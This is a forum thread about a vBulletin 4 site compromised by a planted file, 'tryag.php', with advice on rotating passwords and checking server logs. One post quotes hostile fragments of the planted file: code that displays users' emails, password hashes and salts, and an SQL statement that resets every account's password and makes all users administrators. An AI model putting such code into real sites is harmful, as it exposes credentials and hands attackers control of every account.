<a href="http://pastebin.com/6k6UYFYJ" target="_blank">http://pastebin.com/6k6UYFYJ</a>
That file got uploaded to my forum directory somehow, no clue how.

It was uploaded from the ftp change ftp, cpanel, and forum admin passwords. Check all files in the ftp then once you have removed all they uploaded then upload a fresh copy yourself then also check if they logged into the admin panel if so check logs

Your server logs should tell you how they uploaded the file. You should contact your host and have them look through the logs with you to figure out how this was done.

What was the file name an directory? Also what version of VB4 are you running.

http://pastebin.com/6k6UYFYJ
That file got uploaded to my forum directory somehow, no clue how.

If you check that coding its nasty this is what I mean
<td class="style5"><?echo $r[userid]?></td>
<td class="style5"><?echo $r[username]?></td>
<td class="style5"><?echo $r[email]?></td>
<td class="style5"><?echo $r[password]?></td>
<td class="style5"><?echo $r[salt]?></td>

And
$okey=mysql_query("UPDATE user SET password='e8be21235122e78d824eef4514b87be4',salt=' oky',usergroupid='6'");
But there is even worst parts in the code to worry about in there

What was the file name an directory? Also what version of VB4 are you running.

Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"

Didn't find out how it was uploaded, by logs.

Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.

Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.

When you connect with SSH, it instantly uses the command "sftp", which calls for the SFTP software to transfer files, basically like FTP. The Shell logs (messages & secure) only shows commands, not what happens inside the software. & sftp-server never showed any logs.

My admincp of one my sites once got hacked. They created a plugin that could be ran via ranks.php and have complete control of my server. Since then I stealth protect that admin folder in addition to firewall SSH, FTP. What was stranged but I never complained, the password I was using was unique and specific only on two sites: here and that site. Lucky for me I basically live on my PC and I was able to catch that P0wersurge SOB instantly and protect myself.

Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"

Didn't find out how it was uploaded, by logs.

When you say the latest version, you mean 4.22 PL1 with the install directory deleted correct? It is really a shame your logs did not show anything. Do you suspect he hacked your root name and password?

Did you use them at any other sites?

When you say the latest version, you mean 4.22 PL1 with the install directory deleted correct? It is really a shame your logs did not show anything. Do you suspect he hacked your root name and password?

Did you use them at any other sites?

4.22 PL1, yes. I always remove install directory directly after the installation. It's nearly impossible to hack my root account.

My password is similar to: Lf32KlDo2A0Sdl2lss0SlcSAoisS0221

So no, didn't.